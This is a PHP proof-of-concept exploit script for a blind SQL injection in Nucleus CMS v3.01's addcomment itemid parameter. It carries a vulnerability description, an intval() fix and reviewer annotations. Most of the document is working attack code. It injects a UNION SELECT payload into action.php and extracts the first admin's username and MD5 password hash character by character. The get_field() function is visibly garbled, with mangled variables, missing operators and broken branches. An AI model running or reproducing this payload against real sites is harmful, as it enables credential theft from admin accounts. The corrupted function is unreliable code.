Nucleus CMS v3.01 addcomment/itemid SQL injection proof-of-concept source code (conceptual version). Note: the flaw is an SQL injection, not a buffer or "SQL overflow".
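#!/usr/bin/php
<?php
// Nucleus CMS v3.01 addcomment/itemid SQL injection proof of concept
// By Acidbits  Acidbits@hotmail.com  24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog (PHP/MySQL) application.
//
// This PoC dumps the username and MD5(password) of the admin user stored at
// the first position (mnumber=1) of the members table. It first checks that a
// "union select" can be injected (i.e. the target is not patched) and that the
// first member is an admin, then extracts both fields one character at a time.
//
// Usage (on the author's Debian box):
//   php4 -q nuc_addc_poc.php url
//
// Vulnerability description
//
// In action.php, function addcomment, there is no sanitisation of the
// user-supplied parameter itemid. At line 65:
//
//   $blogid = getBlogIDFromItemID($post['itemid']);
//
// This lets an attacker inject SQL and read data from the database.
//
// Solution
//
// Modify line 65 so that the value is forced to an integer:
//
//   $blogid = getBlogIDFromItemID(intval($post['itemid']));
//
// NOTE(review): intval() closes this particular hole because itemid is a
// numeric identifier; it is not a general fix. Every other value taken from
// $post that reaches a query should be validated the same way or, better,
// bound through a parameterised query. Only run this script against systems
// you are authorised to test.

echo "----------------------------------------------------------------------\n"
   . "| Nucleus CMS v3.01 addcomment/itemid SQL Injection Proof of concept |\n"
   . "| By Acidbits Acidbits@hotmail.com 24-July-2004                      |\n"
   . "----------------------------------------------------------------------\n\n";

if ($argc < 2) die("Usage: " . $argv[0] . " url\n\n");

// Base URL of the target. send_post() reads this as a global and appends
// "action.php" to it, so it must end with a slash.
$host = $argv[1];
if (substr($host, strlen($host) - 1, 1) != '/') $host .= '/';

// Step 1: the oracle must answer "true" for a tautology AND "false" for a
// contradiction. Checking both sides guards against a response that simply
// never contains the "nucleus_ban" marker (e.g. a patched target, a wrong
// URL, or a page that does not expose the error text), which test_cond()
// would otherwise report as "true" for every condition.
echo "Checking if vulnerable and \"union select\" works...";
if (test_cond("1") && !test_cond("0")) echo "OK!\n";
else die("It doesn't :-(\n\n");

// Step 2: the fixed WHERE clause inside test_cond() already restricts the
// union to "madmin and mnumber=1", so this is the same query as step 1 and
// only re-confirms what step 1 established.
echo "Checking if first member of table is admin...";
if (test_cond("1")) echo "OK!\n";
else die("It's not :-(\n\n");

// Step 3: extract the two columns character by character. get_field() echoes
// each character as soon as it is recovered.
echo "\nGetting username: ";
get_field("mname");
echo "\nGetting MD5(password): ";
get_field("mpassword");

die("\n\nDone!\n\n");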
// Recover the value of column $field (of the first admin member row) one
// character at a time and echo each character as soon as it is known.
//
// Each character is located by a binary search over the alphabet in $unval;
// every probe is a test_cond() call, i.e. one HTTP request to the target.
// Note the alphabet is digits, upper case WITHOUT 'Q', and lower case only:
// enough for an MD5 hex digest, but a username containing any other
// character (Q, '_', '-', '.', space, ...) cannot be found and the search
// falls through to the "unexpected error" die() at the end.
//
// NOTE(review): this line is garbled in this copy. The increment of $idx, the
// '+' in the midpoint calculation, the function wrapping substring(...)
// (presumably ascii(), given the extra closing parenthesis) and the two
// branch assignments at the end of the loop all appear to have lost
// characters in extraction. Treat the control flow as approximate and check
// it against the original advisory before relying on it.
function get_field ($ field) {$ unval = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; $ idx = 1; $ min = 0; $ max = strlen ($ unval); while (! $ min = $ max) {$ mid = $ min (( $ MAX- $ min) / 2); if (Test_cond ("Substring ($ Field, $ IDX, 1)) =". ORD (Substr ($ UNVAL, $ MID, 1))))) {$ IDX ; Echo Substr ($ UNVAL, $ MID, 1); $ min = 0; $ max = Strlen ($ unval); if (! test_cond (")") ") Return; Else {IF (Substring ($ Field, $ IDX, 1)) <") <") <"))) $ MAX = $ min = $ min = $ MID;}} DIE ("/ n / nunexpected error! / n / n");
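// Ask the target a yes/no question about the first admin row of nucleus_member.
//
// $cond is an SQL boolean expression. It is url-encoded and appended to the
// fixed WHERE clause of the injected "union select", so the union yields a row
// exactly when $cond holds for the member with mnumber=1 and madmin set.
//
// Returns 1 when the condition holds, 0 otherwise. The oracle is the response
// text: when the string "nucleus_ban" appears (presumably an error from a
// follow-up query on that table once the union returned no blog id) the
// condition is taken as false. Anything else, including an unrelated failure
// page, is reported as true, which is why the caller also verifies that
// test_cond("0") returns 0 before trusting the oracle.
function test_cond($cond) {
    $res = send_post(
        "action=addcomment&url=index.php%3Fitemid%3D1&itemid=1 and 0 union select 1"
        . " from nucleus_member where madmin and mnumber=1 and " . urlencode($cond)
        . "&body=a&user=a&userid="
    );
    // preg_match() replaces the original eregi(): the ereg family was removed
    // in PHP 7, while PCRE is available back to PHP 4.
    if (preg_match('/nucleus_ban/i', $res)) return 0;
    else return 1;
}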
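// POST $data (an already url-encoded body) to action.php under the global
// $host and return the response body as a string.
//
// A transport failure used to come back as boolean false, which test_cond()
// cannot distinguish from a "condition true" page (false contains no
// "nucleus_ban"). Abort with the cURL error instead, consistent with the rest
// of the script, so an unreachable host never reads as a positive result.
function send_post($data) {
    global $host;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host . "action.php");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $res = curl_exec($ch);
    if ($res === false) {
        $err = curl_error($ch);
        curl_close($ch);
        die("\n\ncurl error: " . $err . "\n\n");
    }
    curl_close($ch);
    return $res;
}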
?>